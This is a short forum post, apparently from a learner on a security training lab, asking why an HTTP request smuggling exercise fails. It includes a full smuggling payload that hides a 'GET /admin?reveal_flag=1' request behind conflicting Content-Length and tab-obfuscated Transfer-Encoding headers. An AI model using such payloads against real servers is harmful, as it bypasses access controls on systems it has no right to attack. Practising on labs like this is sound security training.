Hello,
I tried to validate the lesson with the example request but it doesn’t work :
POST / HTTP/1.1
Host: 206.189.26.78:30943
Content-Length: 46
Transfer-Encoding: chunked
0
GET /admin?reveal_flag=1 HTTP/1.1
Dummy:
Of corse \x20 between Transfer-Encoding: and the size has been replaced with \x09
I also tried to send the request with burp intruder and a null payload to have a request every 1s but the flag is never revealed.
Can you help me with that ? any clue